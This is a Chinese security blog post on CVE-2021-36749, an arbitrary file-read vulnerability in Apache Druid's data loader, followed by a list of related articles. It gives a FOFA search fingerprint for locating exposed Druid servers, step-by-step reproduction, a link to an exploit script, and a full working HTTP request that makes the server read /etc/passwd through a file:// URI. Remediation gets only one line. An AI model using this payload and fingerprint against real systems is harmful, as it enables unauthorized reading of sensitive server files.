CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞

最新推荐文章于 2024-04-03 16:32:43 发布
最新推荐文章于 2024-04-03 16:32:43 发布
阅读量207 收藏
点赞数
分类专栏: 漏洞 文章标签: apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58596609/article/details/121951402
版权

0x00 漏洞简介

由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP
InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。

0x01 漏洞复现

 FOFA指纹:

title="Apache Druid"

1 在网站首页左上角点击Load data 

2 点击HTTP(s)

 3 点击Connect Data

 4 在图中位置,读取文件,出现以下图片即复现成功

0x02  漏洞POC和脚本

 脚本地址:CVE-2021-36749/CVE-2021-36749.py at main · BrucessKING/CVE-2021-36749 · GitHub

 POC:

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 413
Accept: application/json, text/plain, */*
Origin: http://127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json;charset=UTF-8
Referer: http://127.0.0.1:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

0x03 漏洞修复方法

升级最新版本并且设置访问权限

种树人1
关注
专栏目录
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
漏洞复现】CVE-2021-36749 Apache Druid LoadData 任意文件读取漏洞
Adminxe的博客
11-18 3293
0x00 漏洞详情 由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。 0x01 fofa语法 title="Apache Druid" 0x02 漏洞复现 主界面–>Load data –>HTTP(s)–>Connect Data–>URIs(使用file://协议进行..
Apache Druid 任意文件读取 CVE-2021-36749 复现
YouthBelief的博客
11-26 2911
所有文章,仅供安全研究与学习之用,后果自负! Apache Druid 任意文件读取 CVE-2021-36749Apache Druid 任意文件读取 CVE-2021-367490x01 漏洞描述0x02 影响范围fofa语法0x03 漏洞复现0x04 漏洞修复 Apache Druid 任意文件读取 CVE-2021-36749 0x01 漏洞描述 由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的
Apache Druid LoadData 任意文件读取 漏洞 CVE-2021-36749
god_Zeo的安全博客
11-17 1193
Apache Druid LoadData 任意文件读取 漏洞 CVE-2021-36749 0x01 漏洞简介 在 Druid 系统中,InputSource 用于从某个数据源读取数据。但是,HTTP InputSource 允许经过身份验证的用户以 Druid 服务器进程的权限从其他来源读取数据,例如本地文件系统。 这不是用户直接访问 Druid 时的权限提升,因为 Druid 还提供了 Local InputSource,它允许相同级别的访问。但是当用户通过允许用户指定 HTTP InputSourc
Apache Druid 任意文件读取漏洞CVE-2021-36749
不光要学,知识要能说出口
11-23 4079
CVE-2021-36749 goby exp声明代码poc集合 声明 本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 代码 { "Name": "Apache Druid Abritrary File Read CVE-2021-36749", "Level": "3", "Tags": [ "fileread" ], "GobyQuery":
Apache Druid LoadData 任意文件读取 CVE-2021-36749
weixin_42345596的博客
11-22 2068
漏洞原理 由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。由于 Apache Druid 默认情况下是缺乏授权认证,攻击者可利用漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。 影响版本 Apache Druid Version < 0.22 fofa语法 title="Apache Druid" 漏洞复现 主界面–>Load data –>HTTP
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
漏洞复现-druid-任意文件读取】vulfocus/druid-cve_2021_36749
10-16 1084
druid-任意文件读取】功能点
Apache Druid任意文件读取漏洞CVE-2021-36749
chaojixiaojingang
03-15 8559
1.漏洞描述 Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。Apache Druid对用户指定的HTTP InputSource没有做限制,并且Apache Druid默认管理页面是不需要认证即可访问的,可以通过将文件URL传递给HTTP InputSource来绕过。因此未经授权的远程攻击者可以通过构造恶意参数读取服务器上的任意文件,造成服务器敏感性信息泄露。 2.影响版本 Apache Druid <= 0.21.1 3...
【中危】Guava<32.0.0 存在竞争条件漏洞
murphysec的博客
06-26 1880
Guava 是 Google 公司开发的开源 Java 代码库,提供常用的Java工具和数据结构。Guava 1.0 至 31.1 版本中的 FileBackedOutputStream 类使用Java的默认临时目录创建文件,由于创建的文件名容易被攻击者猜测,在 Unix 和 Android Ice Cream Sandwich 系统中,允许具有访问默认 Java 临时目录权限的攻击者可创建同名的恶意文件造成文件冲突,如果应用程序依赖于攻击者创建的恶意文件,攻击者可操控应用程序的行为。
Error系列-CVE CIS-2023系统漏洞处理方案集合_[not_implemented] - npm v1 security audits quick
最新发布
uiuuyy67的博客
04-03 1135
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
FOFA语法
bring_coco的博客
03-07 6923
1.title=”beijing” 从标题中搜索“北京” 2.header=”thinkphp” 从http响应头中搜索“thinkphp” 3.body=”管理后台” 从html正文中搜索“管理后台” 4.domain=”163.com” 从子域名中搜索带有“163.com”的网站 5.icon_hash=”-247388890” 搜索使用此icon的资产 6.host=”.gov.cn”
Apache druid 任意文件读取漏洞(CVE-2021-36749)
weixin_44047654的博客
12-05 917
Apache Druid 任意文件读取漏洞(CVE-2021-36749)
[文件读取]Druid 任意文件读取CVE-2021-36749
wj33333的博客
11-14 459
描述: 由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。点击Load data –>HTTP(s)–>Connect data–>URIs(使用file://协议进行读取)查看/etc/passwd。查看/tmp/flag。
Java安全漏洞Druid未授权访问解决
热门推荐
qq_46119575的博客
01-04 2万+
Java安全漏洞Druid未授权访问解决
CVE-2021-36934复现
江左盟的博客
07-24 1万+
漏洞简介 微软在7月20日发布紧急安全公告,公开了一个Windows提权漏洞。由于对多个系统文件(包括安全帐户管理器 (SAM) 数据库)的访问控制列表 (ACL) 过于宽松,攻击者可读取SAM,SYSTEM,SECURITY等文件内容,进而获取用户NTLM Hash值,从而通过解密Hash值或Hash传递等方法造成特权提升漏洞。成功利用漏洞的攻击者可以使用 SYSTEM 权限运行任意代码。 影响范围 微软确认此问题会影响 Windows 10 版本 1809 和更新的操作系统,其他版本还在确认中。 环境
F5 BIG-IP IQ 2021漏洞CVE-2021-22986:远程代码执行风险
### CVE-2021-22986: F5 BIG-IP-IQ 的远程代码执行漏洞分析 **背景**: CVE-2021-22986是一个针对F5 BIG-IP设备及其附属产品BIG-IP IQ(Intelligence Query)的安全漏洞。该漏洞允许攻击者通过不安全的API调用,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值